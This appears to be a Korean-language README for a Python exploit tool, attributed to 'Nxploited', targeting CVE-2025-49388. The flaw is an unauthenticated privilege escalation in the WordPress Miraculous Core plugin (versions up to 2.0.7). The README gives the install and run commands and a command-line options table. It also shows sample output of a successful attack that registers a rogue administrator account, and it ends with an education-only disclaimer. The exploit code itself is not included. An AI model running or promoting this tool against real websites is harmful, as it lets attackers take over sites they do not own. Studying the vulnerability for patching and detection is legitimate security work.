
Miraculous Core (kamleshyadav) ≤ 2.0.7 — 인증되지 않은 권한 상승
WordPress Miraculous Core Plugin 플러그인 <= 2.0.7에서 권한 상승 취약점 발생
kamleshyadav의 Miraculous Core 플러그인(WordPress.org)에서 잘못된 권한 할당 취약점이 발견되어, 인증되지 않은 공격자가 권한을 상승시키고 관리자 계정을 등록할 수 있습니다.
영향받는 버전: n/a ~ 2.0.7
Patchstack CNA CVSS 3.1:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HNIST CVSS: (아직 평가되지 않음)
이 Python 스크립트는 CVE-2025-49388을 자동으로 익스플로잇하여, 취약한 WordPress 인스턴스(Miraculous Core 플러그인 설치됨)에 새로운 관리자 계정을 등록합니다.
높은 신뢰성을 제공하며, 반복적인 신뢰성 있는 익스플로잇을 위해 데이터를 무작위화하고, 헤더, 쿠키, 우회 시도를 자동으로 처리합니다.
의존성 설치:
pip install requests colorama
python CVE-2025-49388.py -u <target-url> [옵션]
예시:
python CVE-2025-49388.py -u http://127.0.0.1/wordpress
참고:
사용자명이나 이메일을 생략하면 각 실행 시 중복 오류를 피하기 위해 무작위 값이 생성됩니다.
[Nxploited INFO] Target: http://target/wp-admin/admin-ajax.php
[Nxploited INFO] Starting exploitation attempt...
[Nxploited SUCCESS] Exploitation succeeded! Nxploited By Nxploited
[Nxploited CREDENTIALS]
Username : Nxploited_4pQz1x
Password : Str0ng!Pass123
Email : [email protected]
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
명시적 허가 없이 시스템을 무단으로 익스플로잇하는 것은 불법이며 비윤리적입니다.
저자는 오용이나 피해에 대해 어떠한 책임도 지지 않습니다. 책임감 있게 사용하십시오.
| 옵션 | 설명 | 예시 |
|---|
-u, --url | 대상 WordPress URL (필수) | -u http://target.com/wordpress |
-un, --username | 원하는 사용자명 (기본값: 무작위) | -un admin1337 |
-fn, --full_name | 전체 이름 (기본값: Nxploited) | -fn "John Doe" |
-em, --useremail | 이메일 (기본값: 무작위) | -em [email protected] |
-pw, --password | 비밀번호 (기본값: Str0ng!Pass123) | -pw MySecretPass! |
-o, --output | 결과를 파일에 기록 | -o result.txt |